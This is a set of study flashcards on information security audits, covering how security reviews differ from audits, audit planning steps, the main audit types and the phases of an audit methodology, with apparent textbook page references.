04.Information Security Control Testing and Evaluation (311) Flashcards
Control Monitoring
Controls neeed to be designed so that monitoring can take place
311
Control Auditing
Reviews and audits form part of an essential function for security managers to determine whether security safe guards are in place and working properly.
311
Security Review and Security Audit
A security review is a less formal and less rigorous examination of one or more controls, processes, or systems
A security audit is a more formal, methodical, and rigerous examination of one or more controls, processes, or systems
Security Review and Security Audit
A security review is typically carried out internally, by the control owner.
A security audit is typically carried out by a separate party
312
Security Audit
Systematic and repeatable process
Competent and independent professional evaluation
2 parties - auditor and auditee
2 types - internal and external
312
Audit Techniques
Audits are a planned event that require formal planning to successfully achieve the objectives
313
Types of planning required;
- Purpose
- Scope
- Risk Analysis
- Audit Procedures
- Resources
- Schedule
Audit Purpose
The auditor and auditee must establish the purpose as to the audit. For example, validating regulatory compliance
313
Audit Scope
The auditor and auditee must establish the scope. This could include specific systems or specific time frames (start to finish)
313
Audit - Risk Anaysis
An auditor needs to know the levels of risk associated with the domain being audited to determine where greatest amount of attention and resources are required
313
Audit - Audit Procedures
The purpose and scope of an audit will help define the relevant procedures used. Specific rules on sample sizes and techniques may be stipulated if the audit for example is a compliance audit
313
Audit - Resources
Determine what resources are needed and available for an audit.
The auditee may have a limited budget for an external audit
Specialist tools may be required to run sufficient analysis
Auditor needs to determine number of person-hours that will be required and skillset
314
Audit - Schedule
Schedule needs to include enough time for interviews, data collection, analysis, report generation.
314
Audit Objectives
Audit Objectives are the specific goals for an audit - typically to determine whether controls exist and if they are effective
314
Types of Audit
The scope, purpose, and objectives of an audit will help to determine the type of audit to be performed.
Auditors must understand the type of audit required so they know what techniques and procedures to deploy
314
Audit Type - Operational Audit
Examination of controls (IT, Security, Business), to determine control existence and effectiveness
315
Audit Type - Financial Audit
Examination of accounting system, including accounting department processes and procedures
315
Audit Type - Integrated Audit
Combined operational and financial audit. Offers auditor complete understanding of entire environments integrity
315
Audit Type - IS Audit
Detailed examination of most/all information systems department operations.
Determines whether IT governance is aligned with organisation objectives and goals
315
Audit Type - Administrative Audit
Examination of operational efficiency within a segment of the organisation
315
Audit Type - Compliance Audit
Determines the level and degree of compliance to law, regulation, standard, internal control, or legal contract.
Particular law or standard requirements require approved and licenced external auditors
315
Audit Type - Forensic Audit
Performed by a forensic specialist to support anticipated or active legal proceeding, or security incident investigation.
Strict procedures must be followed to preserve evidence and avoid evidence being inadmissible due to tampering
315
Audit Type - Service Provider Audit
Third party service organisations undergo external audits to increase customer confidence in the integrity and security of their services
316
Audit Type - Pre-Audit
An examination of business processes in anticipation of an upcoming audit from which the results can be used to implement improvements prior to the audit.
316
Audit Methodology
An audit metholodolgy is the set of audit procedures used to accomplish a set of audit objectives
Typical audit methodology phases;
Audit Subject
Determine which process, info system, domain being audited
Audit Objective
Identify purpose of audit
Type of Audit
Determine the type of audit i.e. operational, financial, integrated etc…
Audit Scope
Identify the business process, department, or application that is subject to the audit
Pre-Audit Planning
Auditor needs certain information from the audit so will plan how this is obtained, techniques, physical locations to visit etc..
316